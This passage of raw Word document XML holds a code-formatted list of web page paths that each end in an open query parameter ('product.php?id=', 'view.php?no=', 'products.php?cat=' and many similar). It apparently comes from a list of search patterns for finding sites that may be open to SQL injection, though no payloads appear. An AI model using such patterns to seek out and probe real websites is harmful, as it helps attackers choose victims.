          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36715D54"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>help/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>com_view.html?code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361633D0"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n_replyboard.php?typeboard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCE734E"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eng_board</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view.php?T</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>****=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672A2869"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prev_results.php?prodID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D435F"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bbs</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view.php?no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEE7DB0"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gnu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/?doc=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B588B2C"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zb</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view.php?uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE006B4"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>global/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>product</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product.php?gubun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336DFAA3"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m_view.php?ps_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D35117D"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productlist.php?tid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ECACD3"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product-list.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAEC7E8"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onlinesales</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product.php?product_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65380464"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garden_equipment</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/Fruit-Cage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>product.php?pr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310D6CEF"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product.php?shopprodid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18E949"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product_info.php?products_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BA74E7"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productlist.php?tid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D23A499"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showsub.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6E63E3"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productlist.php?fid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FAE14C"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products.php?cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A1CE64"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products.php?cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0577AB7F"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product-list.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFAE075"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product.php?sku</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6581C09E"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>store/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>product.php?productid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC75E9E"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products.php?cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2485987C"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productList.php?cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343792A8"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product_detail.php?product_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5302070E"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product.php?pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD57DA1"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view_items.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C413F4A"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more_details.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E25BD65"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lastRenderedPageBreak/>
        <w:t>county-facts</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diary</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vcsgen.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DF986B"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idlechat</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message.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E71AB6"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>podcast/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>item.php?pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F889C9"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products.php?act</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CAE3C7"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details.php?prodId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4790F13B"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socsci</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events</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full_details.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E833728"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ourblog.php?categoryid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7C164"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mall</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more.php?ProdID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2D439"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>archive/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>get.php?message_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C45FB4"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review</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review_form.php?item_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9863CA"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english</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publicproducts.php?groupid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A392FB3"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news_and_notices.php?news_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE7AE69"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rounds-detail.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591AB774"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gig.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCB7A7"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board</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view.php?no</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E6BB1"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index.php?modus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C164009"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news_item.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA39833"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rss.php?cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B12AAFB"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products</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product.php?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3636197B"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details.php?ProdID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C434C"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r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>els_/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C0254">
        <w:rPr>
          <w:rStyle w:val="CodeHTML"/>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas"/>
